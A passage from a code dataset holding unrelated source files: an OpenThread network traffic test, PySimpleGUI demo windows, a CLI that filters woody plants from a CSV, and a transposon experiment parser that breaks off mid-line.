url(r'^regression/', include('regression.urls')),\n url(r'^result/', include('result.urls'))\n]\n","sub_path":"Dj_pro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"214903170","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2018, The OpenThread Authors.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of the copyright holder nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nimport wpan\nfrom wpan import verify\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Test description: Traffic between router and sleepy-end-device\n# (link-local and mesh-local IPv6 addresses)\n\ntest_name = __file__[:-3] if __file__.endswith('.py') else __file__\nprint('-' * 120)\nprint('Starting \\'{}\\''.format(test_name))\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Creating `wpan.Nodes` instances\n\nnode1 = wpan.Node()\nnode2 = wpan.Node()\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Init all nodes\n\nwpan.Node.init_all_nodes()\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Build network topology\n\n# Two-node network (node1 leader/router, node2 sleepy-end-device)\n\nnode1.form('test-PAN')\nnode2.join_node(node1, node_type=wpan.JOIN_TYPE_SLEEPY_END_DEVICE)\n\nverify(node2.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATED)\nverify(node2.get(wpan.WPAN_NAME) == node1.get(wpan.WPAN_NAME))\nverify(node2.get(wpan.WPAN_PANID) == node1.get(wpan.WPAN_PANID))\nverify(node2.get(wpan.WPAN_XPANID) == node1.get(wpan.WPAN_XPANID))\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Test implementation\n\n# Get the link local addresses\nll1 = node1.get(wpan.WPAN_IP6_LINK_LOCAL_ADDRESS)[1:-1]\nll2 = node2.get(wpan.WPAN_IP6_LINK_LOCAL_ADDRESS)[1:-1]\n\n# Get the mesh-local addresses\nml1 = node1.get(wpan.WPAN_IP6_MESH_LOCAL_ADDRESS)[1:-1]\nml2 = node2.get(wpan.WPAN_IP6_MESH_LOCAL_ADDRESS)[1:-1]\n\nNUM_MSGS = 3\nMSG_LENS = [40, 100, 400, 800, 1000]\nPORT = 1234\n\nfor poll_interval in [10, 100, 300]:\n\n node2.set(wpan.WPAN_POLL_INTERVAL, str(poll_interval))\n verify(node2.get(wpan.WPAN_POLL_INTERVAL) == str(poll_interval))\n\n # all src and dst configuration (link-local and mesh-local)\n for src, dst in [(ll1, ll2), (ll1, ml2), (ml1, ll2), (ml1, ml2)]:\n\n for msg_length in MSG_LENS:\n sender = node1.prepare_tx(src, dst, msg_length, NUM_MSGS)\n recver = node2.prepare_rx(sender)\n\n wpan.Node.perform_async_tx_rx()\n\n verify(sender.was_successful)\n verify(recver.was_successful)\n\n # Send and receive at the same time on same port number\n\n s1 = node1.prepare_tx((src, PORT), (dst, PORT), 'Hi there!', NUM_MSGS)\n r1 = node2.prepare_rx(s1)\n s2 = node2.prepare_tx((dst, PORT), (src, PORT), 'Hello back to you!', NUM_MSGS)\n r2 = node1.prepare_rx(s2)\n\n wpan.Node.perform_async_tx_rx()\n\n verify(s1.was_successful and r1.was_successful)\n verify(s2.was_successful and r2.was_successful)\n\n# -----------------------------------------------------------------------------------------------------------------------\n# Test finished\n\nwpan.Node.finalize_all_nodes()\n\nprint('\\'{}\\' passed.'.format(test_name))\n","sub_path":"tests/toranj/ncp/test-007-traffic-router-sleepy.py","file_name":"test-007-traffic-router-sleepy.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"590635145","text":"import PySimpleGUI as sg # Part 1 - The import\nimport matplotlib\nimport numpy as np\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport tkinter\nfrom tkinter import *\n\n\ndef test1():\n # Define the window's contents\n layout = [ [sg.Text(\"What's your name?\")], # Part 2 - The Layout\n [sg.Input()],\n [sg.Button('Ok')] ]\n\n # Create the window\n window = sg.Window('Window Title', layout) # Part 3 - Window Defintion\n\n # Display and interact with the Window\n event, values = window.read() # Part 4 - Event loop or Window.read call\n\n # Do something with the information gathered\n print('Hello', event, values, \"! Thanks for trying PySimpleGUI\")\n\n # Finish up by removing from the screen\n window.close() # Part 5 - Close the Window\n\ndef test2():\n # Define the window's contents\n layout = [[sg.Text(\"What's your name?\")],\n [sg.Input(key='-INPUT-')],\n [sg.Text(size=(40,1), key='-OUTPUT-')],\n [sg.Button('Ok'), sg.Button('Quit')]]\n\n # Create the window\n window = sg.Window('Window Title', layout)\n\n # Display and interact with the Window using an Event Loop\n while True:\n event, values = window.read()\n # See if user wants to quit or window was closed\n if event == sg.WINDOW_CLOSED or event == 'Quit':\n break\n # Output a message to the window\n window['-OUTPUT-'].update('Hello ' + values['-INPUT-'] + \"! Thanks for trying PySimpleGUI\")\n\n # Finish up by removing from the screen\n window.close()\n\ndef test3():\n layout = [[sg.Button(f'{row}, {col}') for col in range(4)] for row in range(4)]\n\n event_str, values = sg.Window('List Comprehensions', layout).read(close=True)\n print(event_str, values)\n\n text = \"Hello\" + \"u\\u00A9\"+\" \"+\"anticancéreux\" + \" 抗肿瘤药 \"\n event, values = sg.Window('Window Title', [[sg.Text(text)],[sg.Input()],[sg.Button('Ok')]]).read(close=True)\n print(event, values)\n\n event, values = sg.Window('Window Title', [[sg.T(\"What's your name?\")],[sg.I()],[sg.B('Ok')]]).read(close=True)\n print(event, values)\n\ndef test4():\n filename = sg.popup_get_file('Enter the file you wish to process')\n sg.popup('You entered', filename)\n\n n = 300\n for i in range(1, n):\n sg.one_line_progress_meter('My Meter', i + 1, n, 'key', 'Optional message')\n print = sg.Print\n for i in range(100):\n print(i)\n\ndef test5():\n sg.theme('Dark Blue 3') # please make your windows colorful\n\n layout = [[sg.Text('Rename files or folders')],\n [sg.Text('Source for Folders', size=(15, 1)), sg.InputText(), sg.FolderBrowse()],\n [sg.Text('Source for Files ', size=(15, 1)), sg.InputText(), sg.FolderBrowse()],\n [sg.Submit(), sg.Cancel()]]\n\n window = sg.Window('Rename Files or Folders', layout)\n\n event, values = window.read()\n window.close()\n folder_path, file_path = values[0], values[1] # get the data from the values dictionary\n sg.Print(folder_path, file_path) ## immediately self-destructs unless blocked\n n = 100\n for i in range(1, n):\n sg.one_line_progress_meter('My Meter', i + 1, n, 'key', 'Optional message')\n\n print(folder_path, file_path)\n print(\"EXIT\")\n\ndef test6():\n import PySimpleGUI as sg\n import os.path\n\n # First the window layout in 2 columns\n\n file_list_column = [\n [\n sg.Text(\"Image Folder\"),\n sg.In(size=(25, 1), enable_events=True, key=\"-FOLDER-\"),\n sg.FolderBrowse(),\n ],\n [\n sg.Listbox(\n values=[], enable_events=True, size=(40, 20), key=\"-FILE LIST-\"\n )\n ],\n ]\n\n # For now will only show the name of the file that was chosen\n image_viewer_column = [\n [sg.Text(\"Choose an image from list on left:\")],\n [sg.Text(size=(40, 1), key=\"-TOUT-\")],\n [sg.Image(key=\"-IMAGE-\")],\n ]\n\n # ----- Full layout -----\n layout = [\n [\n sg.Column(file_list_column),\n sg.VSeperator(),\n sg.Column(image_viewer_column),\n ]\n ]\n\n window = sg.Window(\"Image Viewer\", layout)\n\n # Run the Event Loop\n while True:\n event, values = window.read()\n if event == \"Exit\" or event == sg.WIN_CLOSED:\n break\n # Folder name was filled in, make a list of files in the folder\n if event == \"-FOLDER-\":\n folder = values[\"-FOLDER-\"]\n try:\n # Get list of files in folder\n file_list = os.listdir(folder)\n except:\n file_list = []\n\n fnames = [\n f\n for f in file_list\n if os.path.isfile(os.path.join(folder, f))\n and f.lower().endswith((\".png\", \".gif\", \".txt\"))\n ]\n window[\"-FILE LIST-\"].update(fnames)\n elif event == \"-FILE LIST-\": # A file was chosen from the listbox\n try:\n filename = os.path.join(\n values[\"-FOLDER-\"], values[\"-FILE LIST-\"][0]\n )\n window[\"-TOUT-\"].update(filename)\n window[\"-IMAGE-\"].update(filename=filename)\n\n except:\n pass\n\n window.close()\n\nmatplotlib.use(\"TkAgg\")\n\ndef draw_figure(canvas, figure):\n figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)\n figure_canvas_agg.draw()\n figure_canvas_agg.get_tk_widget().pack(side=\"top\", fill=\"both\", expand=1)\n return figure_canvas_agg\n\n\ndef test7():\n\n fig = matplotlib.figure.Figure(figsize=(5, 4), dpi=100)\n t = np.arange(0, 3, .01)\n fig.add_subplot(111).plot(t, 2 * np.sin(2 * np.pi * t))\n\n # Define the window layout\n layout = [\n [sg.Text(\"Plot test\")],\n [sg.Canvas(key=\"-CANVAS-\")],\n [sg.Button(\"Ok\")],\n ]\n\n # Create the form and show it without the plot\n window = sg.Window(\n \"Matplotlib Single Graph\",\n layout,\n location=(0, 0),\n finalize=True,\n element_justification=\"center\",\n font=\"Helvetica 18\",\n )\n\n # Add the plot to the window\n draw_figure(window[\"-CANVAS-\"].TKCanvas, fig)\n\n event, values = window.read()\n\n window.close()\n\ndef test8():\n import PySimpleGUI as sg\n import cv2\n import numpy as np\n\n def main():\n sg.theme(\"LightGreen\")\n\n # Define the window layout\n layout = [\n [sg.Text(\"OpenCV Demo\", size=(60, 1), justification=\"center\")],\n [sg.Image(filename=\"\", key=\"-IMAGE-\", size=(300,300), pad=(3,3,12,12))],\n [sg.Radio(\"None\", \"Radio\", True, size=(10, 1))],\n [\n sg.Radio(\"threshold\", \"Radio\", size=(10, 1), key=\"-THRESH-\"),\n sg.Slider(\n (0, 255),\n 128,\n 1,\n orientation=\"h\",\n size=(40, 15),\n key=\"-THRESH SLIDER-\",\n ),\n ],\n [\n sg.Radio(\"canny\", \"Radio\", size=(10, 1), key=\"-CANNY-\"),\n sg.Slider(\n (0, 255),\n 128,\n 1,\n orientation=\"h\",\n size=(20, 15),\n key=\"-CANNY SLIDER A-\",\n ),\n sg.Slider(\n (0, 255),\n 128,\n 1,\n orientation=\"h\",\n size=(20, 15),\n key=\"-CANNY SLIDER B-\",\n ),\n ],\n [\n sg.Radio(\"blur\", \"Radio\", size=(10, 1), key=\"-BLUR-\"),\n sg.Slider(\n (1, 11),\n 1,\n 1,\n orientation=\"h\",\n size=(40, 15),\n key=\"-BLUR SLIDER-\",\n ),\n ],\n [\n sg.Radio(\"hue\", \"Radio\", size=(10, 1), key=\"-HUE-\"),\n sg.Slider(\n (0, 225),\n 0,\n 1,\n orientation=\"h\",\n size=(40, 15),\n key=\"-HUE SLIDER-\",\n ),\n ],\n [\n sg.Radio(\"enhance\", \"Radio\", size=(10, 1), key=\"-ENHANCE-\"),\n sg.Slider(\n (1, 255),\n 128,\n 1,\n orientation=\"h\",\n size=(40, 15),\n key=\"-ENHANCE SLIDER-\",\n ),\n ],\n [sg.Button(\"Exit\", size=(10, 1))],\n ]\n\n # Create the window and show it without the plot\n window = sg.Window(\"OpenCV Integration\", layout, size=(800,1000), location=(200, 400))\n\n cap = cv2.VideoCapture(0)\n\n while True:\n event, values = window.read(timeout=20)\n if event == \"Exit\" or event == sg.WIN_CLOSED:\n break\n\n ret, frame = cap.read()\n\n if values[\"-THRESH-\"]:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2LAB)[:, :, 0]\n frame = cv2.threshold(\n frame, values[\"-THRESH SLIDER-\"], 255, cv2.THRESH_BINARY\n )[1]\n elif values[\"-CANNY-\"]:\n frame = cv2.Canny(\n frame, values[\"-CANNY SLIDER A-\"], values[\"-CANNY SLIDER B-\"]\n )\n elif values[\"-BLUR-\"]:\n frame = cv2.GaussianBlur(frame, (21, 21), values[\"-BLUR SLIDER-\"])\n elif values[\"-HUE-\"]:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n frame[:, :, 0] += int(values[\"-HUE SLIDER-\"])\n frame = cv2.cvtColor(frame, cv2.COLOR_HSV2BGR)\n elif values[\"-ENHANCE-\"]:\n enh_val = values[\"-ENHANCE SLIDER-\"] / 40\n clahe = cv2.createCLAHE(clipLimit=enh_val, tileGridSize=(8, 8))\n lab = cv2.cvtColor(frame, cv2.COLOR_BGR2LAB)\n lab[:, :, 0] = clahe.apply(lab[:, :, 0])\n frame = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)\n\n imgbytes = cv2.imencode(\".png\", frame)[1].tobytes()\n window[\"-IMAGE-\"].update(data=imgbytes)\n\n window.close()\n\ndef test9():\n import PySimpleGUI as sg\n\n sg.theme('Dark Blue 3') # Add a touch of color\n # All the stuff inside your window.\n layout = [[sg.Text('Some text on Row 1')],\n [sg.Text('Enter something on Row 2'), sg.InputText()],\n [sg.Button('Ok'), sg.Button('Cancel')]]\n\n # Create the Window\n window = sg.Window('Window Title', layout)\n # Event Loop to process \"events\" and get the \"values\" of the inputs\n while True:\n event, values = window.read()\n if event == sg.WIN_CLOSED or event == 'Cancel': # if user closes window or clicks cancel\n break\n print('You entered ', values[0])\n\n window.close()\n\ndef test10():\n import PySimpleGUI as sg\n\n layout = []\n for i in range(1, 6):\n layout += [sg.Text(f'{i}. xxx'), sg.In(key=i)],\n layout += [[sg.Button('Save'), sg.Button('Exit')]]\n\n window = sg.Window('To Do List Example', layout)\n event, values = window.read()\n\ndef test11():\n # fails on first line\n\n import PySimpleGUI as SG\n# AttributeError: __enter__\n with SG.FlexForm('Everything bagel') as form:\n layout = [\n [SG.Text('All graphic widgets in one form!', size=(30, 1), font=(\"Helvetica\", 25), text_color='blue')],\n [SG.Text('Here is some text.... and a place to enter text')],\n [SG.InputText()],\n [SG.Checkbox('My first checkbox!'), SG.Checkbox('My second checkbox!', default=True)],\n [SG.Radio('My first Radio! ', \"RADIO1\", default=True), SG.Radio('My second Radio!', \"RADIO1\")],\n [SG.Multiline(default_text='This is the default Text shoulsd you decide not to type anything',\n scale=(2, 10))],\n [SG.InputCombo(['Combobox 1', 'Combobox 2'], size=(20, 3)),\n SG.Slider(range=(1, 100), orientation='h', size=(35, 20), default_value=85)],\n [SG.Listbox(values=['Listbox 1', 'Listbox 2', 'Listbox 3'], size=(30, 6)),\n SG.Slider(range=(1, 100), orientation='v', size=(10, 20), default_value=25),\n SG.Slider(range=(1, 100), orientation='v', size=(10, 20), default_value=75),\n SG.Slider(range=(1, 100), orientation='v', size=(10, 20), default_value=10)],\n [SG.Text('_' * 100, size=(70, 1))],\n [SG.Text('Choose Source and Destination Folders', size=(35, 1))],\n [SG.Text('Source Folder', size=(15, 1), auto_size_text=False, justification='right'),\n SG.InputText('Source'), SG.FolderBrowse()],\n [SG.Text('Destination Folder', size=(15, 1), auto_size_text=False, justification='right'),\n SG.InputText('Dest'),\n SG.FolderBrowse()],\n [SG.Submit(), SG.Cancel(), SG.SimpleButton('Customized', button_color=('white', 'green'))]\n ]\n\n button, values = form.LayoutAndRead(layout)\n\ndef test12():\n import PySimpleGUI as sg\n\n sg.theme('Dark Brown 1')\n\n headings = ['HEADER 1', 'HEADER 2', 'HEADER 3', 'HEADER 4']\n header = [[sg.Text(' ')] + [sg.Text(h, size=(14, 1)) for h in headings]]\n\n input_rows = [[sg.Input(size=(15, 1), pad=(0, 0)) for col in range(4)] for row in range(10)]\n\n layout = header + input_rows\n\n window = sg.Window('Table Simulation', layout, font='Courier 12')\n event, values = window.read()\n\ndef test13():\n import PySimpleGUI as sg\n\n def ToDoItem(num):\n return [sg.Text(f'{num}. '), sg.CBox(''), sg.In()]\n\n layout = [ToDoItem(x) for x in range(1, 6)] + [[sg.Button('Save'), sg.Button('Exit')]]\n\n window = sg.Window('To Do List Example', layout)\n event, values = window.read()\n\ndef test14():\n import PySimpleGUI as sg\n import matplotlib.pyplot as plt\n\n \"\"\"\n Simultaneous PySimpleGUI Window AND a Matplotlib Interactive Window\n A number of people have requested the ability to run a normal PySimpleGUI window that\n launches a MatplotLib window that is interactive with the usual Matplotlib controls.\n It turns out to be a rather simple thing to do. The secret is to add parameter block=False to plt.show()\n \"\"\"\n\n def draw_plot():\n plt.plot([0.1, 0.2, 0.5, 0.7])\n plt.show(block=False)\n\n layout = [[sg.Button('Plot'), sg.Cancel(), sg.Button('Popup')]]\n\n window = sg.Window('Have some Matplotlib....', layout)\n\n while True:\n event, values = window.read()\n if event in (sg.WIN_CLOSED, 'Cancel'):\n break\n elif event == 'Plot':\n draw_plot()\n elif event == 'Popup':\n sg.popup('Yes, your application is still running')\n window.close()\n\ndef test15():\n import PySimpleGUI as sg\n \"\"\" \n Demonstrates using a \"tight\" layout with a Dark theme. \n Shows how button states can be controlled by a user application. The program manages the disabled/enabled \n states for buttons and changes the text color to show greyed-out (disabled) buttons \n \"\"\"\n\n sg.ChangeLookAndFeel('Dark')\n sg.SetOptions(element_padding=(0, 0))\n\n layout = [[sg.T('User:', pad=((3, 0), 0)), sg.OptionMenu(values=('User 1', 'User 2'), size=(20, 1)),\n sg.T('0', size=(8, 1))],\n [sg.T('Customer:', pad=((3, 0), 0)), sg.OptionMenu(values=('Customer 1', 'Customer 2'), size=(20, 1)),\n sg.T('1', size=(8, 1))],\n [sg.T('Notes:', pad=((3, 0), 0)), sg.In(size=(44, 1), background_color='white', text_color='black')],\n [sg.Button('Start', button_color=('white', 'black'), key='Start'),\n sg.Button('Stop', button_color=('white', 'black'), key='Stop'),\n sg.Button('Reset', button_color=('white', 'firebrick3'), key='Reset'),\n sg.Button('Submit', button_color=('white', 'springgreen4'), key='Submit')]\n ]\n\n window = sg.Window(\"Time Tracker\", layout, default_element_size=(12, 1), text_justification='r',\n auto_size_text=False, auto_size_buttons=False, default_button_element_size=(12, 1),\n finalize=True)\n\n window['Stop'].update(disabled=True)\n window['Reset'].update(disabled=True)\n window['Submit'].update(disabled=True)\n recording = have_data = False\n while True:\n event, values = window.read()\n print(event)\n if event == sg.WIN_CLOSED:\n exit(69)\n if event == 'Start':\n window['Start'].update(disabled=True)\n window['Stop'].update(disabled=False)\n window['Reset'].update(disabled=False)\n window['Submit'].update(disabled=True)\n recording = True\n elif event == 'Stop' and recording:\n window['Stop'].update(disabled=True)\n window['Start'].update(disabled=False)\n window['Submit'].update(disabled=False)\n recording = False\n have_data = True\n elif event == 'Reset':\n window['Stop'].update(disabled=True)\n window['Start'].update(disabled=False)\n window['Submit'].update(disabled=True)\n window['Reset'].update(disabled=False)\n recording = False\n have_data = False\n elif event == 'Submit' and have_data:\n window['Stop'].update(disabled=True)\n window['Start'].update(disabled=False)\n window['Submit'].update(disabled=True)\n window['Reset'].update(disabled=False)\n recording = False\n\ndef delib_error():\n import PySimpleGUI as sg\n\n def main():\n sg.set_options(suppress_raise_key_errors=False, suppress_error_popups=False, suppress_key_guessing=False)\n\n layout = [[sg.Text('My Window')],\n [sg.Input(k='-IN-'), sg.Text(size=(12, 1), key='-OUT-')],\n [sg.Button('Go'), sg.Button('Exit')]]\n\n window = sg.Window('Window Title', layout, finalize=True)\n\n while True: # Event Loop\n event, values = window.read()\n print(event, values)\n if event == sg.WIN_CLOSED or event == 'Exit':\n break\n# this is a deliberate error\n window['-O U T-'].update(values['-IN-'])\n window.close()\n\n def func():\n\n main()\n\n func()\n\ndef tree():\n treedata = sg.TreeData()\n\n treedata.Insert(\"\", '_A_', 'A', [1, 2, 3])\n treedata.Insert(\"\", '_B_', 'B', [4, 5, 6])\n treedata.Insert(\"_A_\", '_A1_', 'A1', ['can', 'be', 'anything'])\n\n layout = [[sg.Text('My Window')],\n [treedata],\n [sg.Input(k='-IN-'), sg.Text(size=(12, 1), key='-OUT-')],\n [sg.Button('Go'), sg.Button('Exit')]]\n\n window = sg.Window('Window Title', layout, finalize=True)\n\n while True: # Event Loop\n event, values = window.read()\n print(event, values)\n if event == sg.WIN_CLOSED or event == 'Exit':\n break\n # this is a deliberate error\n# window['-O U T-'].update(values['-IN-'])\n window.close()\n\n\ndef slider():\n # Testing async window, see if can have a slider\n # that adjusts the size of text displayed\n\n import PySimpleGUI as sg\n fontSize = 12\n layout = [[sg.Spin([sz for sz in range(6, 172)], font=('Helvetica 20'), initial_value=fontSize, change_submits=True,\n key='spin'),\n sg.Slider(range=(6, 172), orientation='h', size=(10, 20),\n change_submits=True, key='slider', font=('Helvetica 20')),\n sg.Text(\"Aa\", size=(2, 1), font=\"Helvetica \" + str(fontSize), key='text')]]\n\n sz = fontSize\n window = sg.Window(\"Font size selector\", layout, grab_anywhere=False)\n # Event Loop\n while True:\n event, values = window.read()\n if event == sg.WIN_CLOSED:\n break\n sz_spin = int(values['spin'])\n sz_slider = int(values['slider'])\n sz = sz_spin if sz_spin != fontSize else sz_slider\n if sz != fontSize:\n fontSize = sz\n font = \"Helvetica \" + str(fontSize)\n window['text'].update(font=font)\n window['slider'].update(sz)\n window['spin'].update(sz)\n\n print(\"Done.\")\n\n# test1()\n# test2()\n# test3()\n# test4()\ntest5()\n# test6()\n# test7()\n# test8()\n# test9()\n# test10()\n# test11()\n# test12()\n# test13()\n# test14()\n# test15()\n# delib_error()\n# tree()\n# slider()","sub_path":"pyami/tst/pysimpleg.py","file_name":"pysimpleg.py","file_ext":"py","file_size_in_byte":20623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"240132102","text":"import os\r\nimport argparse\r\n\r\nfrom Analyzer import filter_woody_plants\r\nfrom SheetManager import read_csv, export_csv\r\n\r\n# Detect missing packages before any action is taken\r\nimport csv, requests, bs4\r\n\r\nsource_path = None\r\ntarget_path = None\r\nexclude_list = []\r\ncancel = False\r\n\r\n# The argparse module is very helpful in this program, and the way it's set up allows source and target to be individually optional, which is different from when I was using sys.argv\r\n# The only reason I wanted to include argparse originally was to add --exclude and to have it feel native, but it changed how source and target are written\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-s\", \"--source\", nargs=1, help=\"the file path of the source csv\") # Only accepts one argument\r\nparser.add_argument(\"-t\", \"--target\", nargs=1, help=\"the file path of the target csv\") # Only accepts one argument\r\nparser.add_argument(\"-x\", \"--exclude\", action=\"extend\", nargs=\"+\", type=str, metavar=\"TAXON\", help=\"taxa to exclude\") # Doesn't have a limit on taxon excludes, they will be iterated anyway\r\n\r\nargs = parser.parse_args() # Parses with sys.argv by default, which is fine\r\n\r\nif bool(args.exclude):\r\n # Excludes are passed\r\n for taxon in args.exclude:\r\n # Supports extra arguments, comma separation, or a combination of the two\r\n # Removes leading and trailing whitespace, which makes comma separation more flexible\r\n exclude_list += [x.strip() for x in str(taxon).split(\",\")]\r\nelse:\r\n # No excludes passed, ask user\r\n raw_exclude = str(input(\"What, if any, taxa (genus or species) should be excluded from the filtered list? Leave blank if none. (e.g. > Genus1 Species1, Genus2, [...])\\n[list] > \"))\r\n if raw_exclude.replace(\" \", \"\") != \"\":\r\n # Almost the same as what is done above except with only one str\r\n exclude_list += [x.strip() for x in raw_exclude.split(\",\")]\r\n\r\n# Remove useless strings created during comma separation (usually not needed)\r\nexclude_list = [x for x in exclude_list if x != \"\"]\r\n\r\n# NOTE: It's not a big deal if a taxon is misspelled, it just won't filter anything; the user will be notified of this at the end.\r\n\r\n# We can check whether the argument is passed by converting them to bool; they are a list when passed, so any string inside makes it True\r\nif bool(args.source):\r\n # Source passed in command line\r\n source_path = args.source[0]\r\nelse:\r\n # Source not passed, request from user\r\n source_path = str(input(\"What is the file path of the source CSV spreadsheet? (If file is not located in the same directory as this program, use the full path.)\\n[file path] > \"))\r\n\r\nif bool(args.target):\r\n # Target passed in command line\r\n target_path = args.target[0]\r\nelse:\r\n # Target not passed, request from user\r\n target_path = str(input(\"What is the file path of the target CSV spreadsheet? (The CSV output document will be created at the target path; enter filename only to put it in this folder.)\\n[file path] > \"))\r\n\r\n# Check the program inputs before utilizing them\r\nif source_path.replace(\" \", \"\") == \"\":\r\n # Source path is empty/whitespace (should only occur when using input())\r\n raise InputError(\"Source file path cannot be empty.\")\r\n exit(1)\r\nif target_path.replace(\" \", \"\") == \"\":\r\n # Target path is empty/whitespace (same as above)\r\n raise InputError(\"Target file path cannot be empty.\")\r\n exit(1)\r\nif not os.path.isfile(source_path):\r\n # Source path is not a file or doesn't exist (only calls os.path.isfile(), meaning the path to a folder would raise this as well)\r\n raise FileNotFoundError(\"The document at the source path could not be found. (This could also mean the path led to a folder.)\")\r\n exit(1)\r\nif os.path.isfile(target_path):\r\n # Target path points to an existing file, ask user before overwrite (doesn't matter if there is a folder with the same name, though)\r\n if str(input(f\"A file was detected at the target path '{target_path}'. Running this program will overwrite the file at this path. Proceed anyway?\\n[y/n] > \")).lower() in (\"y\", \"yes\"):\r\n print(\"--> Target file will be overwritten after filtering is complete. Pressing Ctrl+C (Windows/Linux) or \\u2318+. (Mac) to halt the program during the filtering process can prevent this.\")\r\n else:\r\n cancel = True\r\n print(\"--> Operation skipped.\")\r\n # The other errors should probably exit the program, but this one can just pass without processing the file if this is being run externally\r\n\r\nif not cancel:\r\n #print(f\"finish program with source '{source_path}', target '{target_path}' and excluding {exclude_list}\")\r\n print(\"Gathering data from source file...\")\r\n csv_data_raw = read_csv(source_path) # Read and group the data from source CSV file\r\n print(\"Filtering species... (Species will appear below; this may take a while!)\")\r\n csv_data_filtered = filter_woody_plants(csv_data_raw, exclude_list) # Analyze and filter data\r\n print(\"Writing to target file...\")\r\n export_csv(target_path, csv_data_filtered) # Save to target CSV file (overwrites file if already present)\r\n print(\"Done. If you are concerned about accuracy, be sure to check the output manually for false positives.\")\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"476096648","text":"import re\nfrom transposon.parser.registry import parser_factory\nfrom transposon.parser.experiment import ExperimentParser\nfrom transposon.rc import GROUP_TO_TREATMENTGROUP\n\n\n@parser_factory.register(['AA184', 'AA209', 'AA238', 'AA224'])\nclass TMGTIDParser1(ExperimentParser):\n\n def _skip(self, row):\n sname = self._sname(row)\n return \"Ink4aARF-24376-MA-XTM\" in sname\n\n def PbType(self, row):\n sname = self._sname(row)\n pos = sname.find('ATP')\n return \"ATP{}\".format(sname[pos+3])\n\n def StudyId(self, row):\n sname = self._sname(row)\n p = r'ATP[1|2]-(\\d+)-'\n match = re.search(p, sname)\n return match.group(1)\n\n def GeneticBackground(self, row):\n sname = self._sname(row)\n p = r'(arf|ink4aarf|brafv600e)'\n matches = re.findall(p, sname.lower())\n if len(matches) == 0:\n return \"WT\"\n if len(matches) > 1:\n raise ValueError('More than one background for {}'\n .format(sname))\n group = matches[0]\n if group == 'arf':\n return 'ARFKO'\n if group == 'ink4aarf':\n return 'Ink4aARFKO'\n if group == 'brafv600e':\n return 'BrafV600E'\n raise ValueError(\"Invalid genetic background {} for {}\"\n .format(group, sname))\n\n def Compound(self, row):\n return 'none'\n\n def TreatmentDosage(self, row):\n return '-'\n\n def TreatmentGroup(self, row):\n if self.PassageNumber(row) >= 0:\n return 'spontaneous_passage'\n tokens = self._tokenize(row, '-')\n group = tokens[-1].lower()\n return GROUP_TO_TREATMENTGROUP[group]\n\n\n@parser_factory.register(['AA257'])\nclass TMGTIDParser2(ExperimentParser):\n \"\"\"\n Specific parser for experiments which contain T-cells. We apply\n a special parser for T-cells but revert to TMGTIDParser for other samples\n \"\"\"\n\n def __init__(self, experiment_id):\n super(TMGTIDParser2, self).__init__(experiment_id)\n self.invivo_parser = TMGTIDParser1(experiment_id)\n\n def SampleName(self, row):\n if not self._is_t_cell(row):\n return self.invivo_parser.SampleName(row)\n sname = self._sname(row)\n p = r'[3|5]_(SW946-CD8\\+Day-\\d+-Spleen-cell|SW946-CD8\\+Day-\\d+)'\n match = re.search(p, sname).group(1)\n return \"{}_{}\".format(match, self.PbAnnot(row))\n\n def _is_t_cell(self, row):\n sname = self._sname(row)\n return 'CD8' in sname or 'cells' in sname\n\n def PbType(self, row):\n if not self._is_t_cell(row):\n return self.invivo_parser.PbType(row)\n return \"ATP2\"\n\n def Tumor(self, row):\n if not self._is_t_cell(row):\n return self.invivo_parser.Tumor(row)\n return '-'\n\n def Barcode(self, row):\n if not self._is_t_cell(row):\n return self.invivo_parser.Barcode(row)\n return '-'\n\n def StudyId(self, row):\n if not self._is_t_cell(row):\n return self.invivo_parser.StudyId(row)\n return '-'\n\n def GeneticBackground(self, row):\n if not self._is_t_cell(row):\n return self.invivo_parser.GeneticBackground(row)\n return 